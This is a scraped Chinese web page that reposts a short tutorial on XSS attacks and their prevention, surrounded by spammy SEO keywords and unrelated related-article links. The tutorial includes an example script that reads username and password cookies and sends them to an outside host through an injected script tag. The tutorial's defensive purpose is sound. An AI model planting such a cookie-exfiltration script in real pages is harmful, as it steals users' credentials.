当前位置: 首页 > news >正文

建站合同模板软件大全下载app免费

建站合同模板,软件大全下载app免费,网站开发的摘要,长沙的企业网站建设title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全 今天学习了一个网络攻击的手段#xff0c;XSS攻击技术#xff0c;大家自建网站的朋友#xff0c;记得看看是否有此漏洞。 #x1f388; XSS 攻击 全称跨站脚本攻击 Cross Site Sc… title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全 今天学习了一个网络攻击的手段XSS攻击技术大家自建网站的朋友记得看看是否有此漏洞。 XSS 攻击 全称跨站脚本攻击 Cross Site Scripting。 为了与重叠样式表 CSS 进行区分所以换了另一个缩写名称 XSS。 XSS攻击者通过篡改网页注入恶意的 HTML 脚本一般是 javascript在用户浏览网页时控制用户浏览器进行恶意操作的一种攻击方式。 XSS 攻击经常使用在论坛博客等应用中。攻击者可以偷取用户Cookie、密码等重要数据进而伪造交易、盗取用户财产、窃取情报等私密信息。 就像上图如果用户在评论框中输入的并不是正常的文本而是一段 javascript 脚本而后台又没对该用户的数据进行处理直接存入数据库那么当其他用户过来访问该页面浏览器必然会执行这段脚本 当然这只是恶趣味而真正的黑客并不会仅仅满足这样的恶趣味可能更多的是想通过这些 注入脚本获取你的 个人信息 甚至是你的账号密码等信息。 由上图可知用户其实在评论的时候引入了一个第三方脚本在这个脚本中获取你浏览器的 cookie 信息并发送到指定的接口进行保存处理这样你的信息就已经泄露了: // attack.js 中的逻辑 var uname $.cookie(username); // 获取账号 var pwd $.cookie(password); // 获取密码// 发送请求 $(body).appendTo(script srchttp://autofelix.com/index.php?username${uname}password${pwd}/script); 在上面逻辑中脚本中获取了你的个人信息并将你的个人信息发送到后端 php 文件中进行处理保存这样你的个人信息就已经泄露了所以杜绝 xss攻击 在网络安全中非常的重要 所以后端永远不要相信用户提交的数据在接收用户提交的信息时候要进行 消毒处理 也就是过滤一些特殊的字符比如 javascript 脚本中的 进行转移 再进行存储这样就能有效的进行 xss 攻击的预防 另外如果 cookie 中设置了 HttpOnly 属性那么通过 js 脚本将无法读取到cookie 信息这样也能有效的防止 XSS 攻击窃取 cookie 内容 好记性不如烂笔头。
http://www.w-s-a.com/news/640407/

相关文章:

  • 肃宁网站制作价格外国设计师素材网站
  • 自已建网站用jsp做的可运行的网站
  • 外贸建站代理网站建设设计公司哪家好
  • 普升高端品牌网站建设台州中兴建设咨询有限公司网站
  • 模板演示网站移动网站开发公司
  • 网站管理办法制度公司招聘信息
  • 宜昌市建设监理协会网站免备案免费域名
  • 河北省建设银行网站首页备案号怎么放到网站
  • 做电脑网站用什么软件有哪些wordpress版权修改
  • 加强部门网站建设工作wordpress文章页横幅
  • 中英网站怎么做wordpress本地音乐
  • 万网提供的网站建设服务的具体项目祥云平台网站建设
  • ftp网站怎么看后台的代码网站 制作软件
  • 网站开发软件教程网站tag 怎么实现
  • 中国建设监理协会化工监理协会网站彩票站自己做网站吗
  • 170个可带链接锚文本外链的网站论坛微信上如何创建小程序
  • 用js来做网站亳州建设局网站
  • 做网站的公司利润多少呢纺织厂网站模板
  • 网页设计构建的基本流程宜宾seo网站建设
  • 西安网站开发公司价格保定徐水网站建设
  • 学做川菜下什么网站软件著作权和专利的区别
  • 百度网站标题东莞外包公司有哪些
  • 织梦增加网站英文名称网页界面设计特点
  • 企业如何进行网站建设棋牌代理平台
  • 韩国做美食网站有哪些seo优化在线诊断
  • 网站建设规划模板做擦边网站
  • 做网站台式还是笔记本网上下载的免费网站模板怎么用
  • 高校网站群管理系统凡科建站是永久的吗
  • 深圳网站建设服务电话网站通栏设计素材
  • 网站里面的视频功能怎么做网站名注册